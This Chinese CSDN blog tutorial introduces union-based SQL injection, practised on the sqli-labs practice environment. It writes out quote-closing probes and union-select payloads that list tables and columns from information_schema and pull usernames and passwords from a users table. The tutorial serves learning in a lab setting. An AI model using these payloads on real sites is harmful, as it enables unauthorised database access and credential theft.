SQL注入基础篇

最新推荐文章于 2024-03-20 22:30:22 发布
最新推荐文章于 2024-03-20 22:30:22 发布
阅读量402 收藏 3
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41409656/article/details/79106492
版权

原理:在可以传入的参数的地方(GET,POST,Cookie)带入正常SQL查询语句,对服务器来说就是恶意的代码传入

利用:同SQL注入可以直接有效的获取服务数据库当前用户所能访问的所有信息(需要知道数据库的结构)​,利用SQL注入的核心是闭合前面的SQL语句,然后执行我们后面的语句。

​学习的环境:phpstudy集成环境+SQL注入天书

        这个环境默认的MYSQL会存在一个数据库information_schema,里面有3个表存放了所以在当前环境下的数据库的结构

        1.columns:存放列信息(名) table_schema  table_name  column_name

        2.schemata :数据信息(名) schema_name

        3. tables:存放表信息(名)​  table_schema   table_name

注入点的寻找:

           一般寻找跟ID有关的参数带入点,手工尝试是否可以注入,当然也有用工具去扫不一定能扫出来(啊D,明小子)​。一般在带有数字参数的地方(id=1)拼接

           or​ 1=1 --+  ;  ' or  1=1--+; "or 1=1 --+;  ) or 1=1 --+;  ')or​ ;") or 之类的

实战​传入正常的ID值


​​传入一个否定的语句 1' and 1=2 --+(结尾都需要--+ (就是#号)去注释后面的语句让后面的语句没办法执行,执行我们想执行的语句就OK了


​​获取当前表的数据列 使用 order by


​​​当我们输入3的时候回显正确


​​​当我们输入3的时候回显正确,确定当前有3个列的数据,对应下图的位置


可以看到只2个地方是可以回显数据的

注:id=-1是反之前的没有内容回显,好回显我们需要的数据


注入获取当前数据库和数据库版本


获取当前数据库有哪些表

?id=-1' union select  1,2,group_concat(table_name)  from information_schema.tables where table_schema='security' --+


获取users表里面的字段        ?id=-1' union select 1,2,group_concat(column_name)    from information_schema.columns  where  table_schema='security'  and  table_name='users'   --+


获取其他用户的信息比如ID=2的

?id=-1' union select  1,username,password from security.users where id =2   --+


小结:这种没有过滤的SQL语句,只要闭合了第一个变量就可以通过正常的SQL语句慢慢注入出我们想要的数据,结尾都需要--+去注释后面的语句让后面的语句没办法执行,执行我们想执行的语句就OK了

Archer巍
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入文献.zip
03-18
Detection and Analysis of Attacks Against Web.pdf):这论文可能涵盖了广泛的Web应用攻击,包括SQL注入,对攻击的检测和分析方法进行了全面讨论,为防御策略提供了理论基础。 4. **2017-一种新颖的防止SQL注入...
T-SQL如何防止SQL注入的解决方法
09-11
SQL注入是一种常见的网络安全威胁,它发生在攻击者通过输入恶意的SQL语句来操纵数据库系统时。攻击者通常利用应用程序对用户输入数据的不适当验证,将有害的SQL代码嵌入到查询中,导致服务器执行非预期的数据库操作...
SQL注入基础
技術萬花筒
06-11 724
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。     SQL注入是从正常的
***学习笔记--基础--sql注入(数字型)
weixin_34364071的博客
09-28 601
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点(1)知识点回顾如果上一有好好读过的同学应该知道,我们上一遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被...
SQL注入基础
2302_79359652的博客
02-14 946
information_schema这个数据库下面包含了所有数据库的所有信息获取一下所有数据库的数据库名。
SQL注入基础入门
m0_52149675的博客
03-28 1936
SQL注入基础入门 ,简单Sqli-labs/Less-2演示
SQL注入--基础注入
qq_51003021的博客
08-12 1476
sql注入的原理就是在服务器后端对数据库进行操作请求之前,人为地对sql语句做一些恶意注入,从而达到人为预期效果,造成数据泄露甚至数据破坏。注入漏洞在OWASP2021年的总结中位列TOP10的第一名,可见注入漏洞的危害之大,理论上注入漏洞可以帮助我们办到任何后端可以办到的事情。...
sql注入基础
qq_35599248的博客
01-09 2247
前言 sql注入相信大家或多或少都了解过,它的原理呢就是通过拼接你的输入到后端的sql语句中然后执行返回你获取的信息,它的危害就不言而喻了。已下主要针对mysql数据库,其它数据库同理,只是有些函数和语法不同而已。 小案例 首先我们先看一个简单的例子吧 我下面会专门把拼接后的语句显示出来方便大家理解 SqlLabs-Less1 先看它正常有哪些返回 当输入的id存在就会返回对应的用户名和密码,不存在就不返回。 然后当我输入http://127.0.0.1/sqli-labs/Less-1/?id=1’就
sql注入 mysql 详细使用方式
weixin_45425685的博客
03-20 1164
sql注入mysql
SQL注入攻击总结
MSB_WLAQ的博客
10-13 1515
本文是关于SQL各种类型数据库的注入攻击自我复习总结,如果文中有不足的地方,麻烦大佬在评论中指出或者私聊我,谢谢~ 本文讲述: SQL注入的原理 SQL注入的防御 SQL攻击的流程 其他数据库的注入方法 ———————————————————————————— sqll注入原理 当用户访问动态网页时,Web服务器会想数据访问层发起SQL查询请求,若此时攻击者在当前网页构造恶意SQL语句,并一起带入数据库执行,那么会带来意想不到的危害。例如获取/篡改业务核心数据,获取服务器权限,严重可导致数据库瘫痪。
SQL注入思路基础
热门推荐
钟言的博客
12-18 1万+
SQL注入思路基础第一课,详细内容包含了SQL注入环境搭建 SQL靶场实践 1、源码分析 2、联合查询 数据库表 3.1 查询所有库名 3.2 查询表名 3.3 查询列名 SQLMAP的使用 1、安装 2、执行 3、查出数据库 4、找出目前用户权限 5、导出该数据库下的表 6、注入得到该表的列名 7、导出数据等等
SQL注入漏洞利用
Kali与编程
12-10 1085
渗透测试工程师可以检查Web应用程序中的输入字段,例如用户提交的表单、URL参数和Cookie等,以确定是否存在潜在的注入点。作为渗透测试工程师,了解SQL注入漏洞的利用是非常重要的,因为它可以帮助您发现并利用目标Web应用程序中的漏洞。SQL注入攻击的原理是利用了Web应用程序中的输入验证不充分,允许恶意用户将恶意代码注入到SQL查询中的漏洞。如果我们将id参数设置为’ union select 1,2,3–,应用程序可能会返回一个包含3个列的结果集,其中第一列的值为1,第二列的值为2,第三列的值为3。
SQL注入基础操作.pdf
09-19
在本文中,我们将深入探讨SQL注入基础知识,以"SQL注入基础操作.pdf"为引导,讲解如何识别和利用这种漏洞。 首先,我们通过一个具体的例子来理解SQL注入。假设有一个网站的论坛登录页面,用户输入用户名和密码...
python 零基础学习 MySQL数据库3 sql注入和防止sql注入 .mp4
04-21
python 零基础学习
基于Springboot和Vue的图书借还管理系统源码 图书借还管理系统代码(高分毕设)
07-28
图书借还管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
C语言内存管理:静态与动态分配的较量
07-28
C语言是一种通用的编程语言,由丹尼斯·里奇(Dennis Ritchie)在20世纪70年代早期于美国电话电报公司(AT&T)的贝尔实验室开发。C语言以其高效性、灵活性和可移植性而闻名,它是一种过程式编程语言,提供了对底层硬件的直接访问能力。 C语言的特点包括: 1. **简洁高效**:C语言的语法简洁,执行效率高,适合编写系统软件。 2. **接近硬件**:C语言提供了对内存地址和位操作的直接控制,使其非常适合硬件级编程。 3. **可移植性**:C语言编写的程序可以在不同的操作系统和硬件平台上编译和运行,具有很好的可移植性。 4. **丰富的库支持**:C语言拥有大量的标准库,如标准输入输出库(stdio.h)、数学库(math.h)等。 5. **结构化编程**:C语言支持结构化编程,允许使用循环、条件判断和函数等控制结构。 6. **指针**:C语言的指针功能强大,可以操作内存地址,实现复杂的数据结构和算法。 7. **编译型语言**:C语言是一种编译型语言,源代码需要通过编译器转换成机器码才能运行。 C语言广泛应用于操作系统(如Unix和Linux)、嵌入式系统、高性能
通讯协议规范-命令包格式
07-28
提供一份通讯协议规范,包含命令包、格式等,在上下位机调试的时候可参考该文档,制定对应的通讯协议。
四足宠物机器狗动态步行规划与仿真.pdf
最新发布
07-28
四足宠物机器狗动态步行规划与仿真
SQL注入基础学习:从神话到数据库原理
"这资料主要介绍了SQL注入基础知识,包括数据库基础概念、SQL注入漏洞的形成、其在渗透测试中的作用以及常见的SQL注入过程。通过一个寓言故事引入,激发学习兴趣,然后深入讲解相关技术点。" 在IT安全领域,SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值